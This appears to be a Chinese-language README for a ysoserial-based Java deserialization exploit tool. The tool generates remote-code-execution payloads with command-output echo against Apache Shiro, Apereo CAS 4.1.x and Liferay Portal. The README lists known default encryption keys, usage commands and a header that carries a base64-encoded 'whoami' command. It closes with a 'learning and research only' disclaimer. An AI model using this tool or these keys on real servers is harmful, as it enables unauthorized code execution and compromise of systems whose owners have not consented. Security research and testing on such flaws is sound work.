JAVA反序列化漏洞回显部分框架和场景下的环境
- Request/Response回显
- 支持win和linux payload
- base64编码
- ApereoCAS 4.1.X 默认密钥
- Shiro spring 环境下回显
- Liferay protal 7.0 以上
mvn clean package -DskipTests
Author: JF
Usage: java -jar yso-echo-all.jar shiro linux [key default kPH+bIxk5D2deZiIxcaaaA==]
Usage: java -jar yso-echo-all.jar shiro linux 0AvVhmFLUs0KTA3Kprsdag==
Usage: java -jar yso-echo-all.jar liferay win
Usage: java -jar yso-echo-all.jar apereo linux
[Add Request header] c=d2hvYW1p (whoami)
Available payload types:
Payload Authors Dependencies
------- ------- ------------
apereo commons-collections4:4.0
liferay commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
shiro commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
shiro spring env
- https://github.com/frohoff/ysoserial
- https://www.freebuf.com/vuls/226149.html
- https://www.00theway.org/2020/01/04/apereo-cas-rce/
仅供学习研究使用,请勿用于非法用途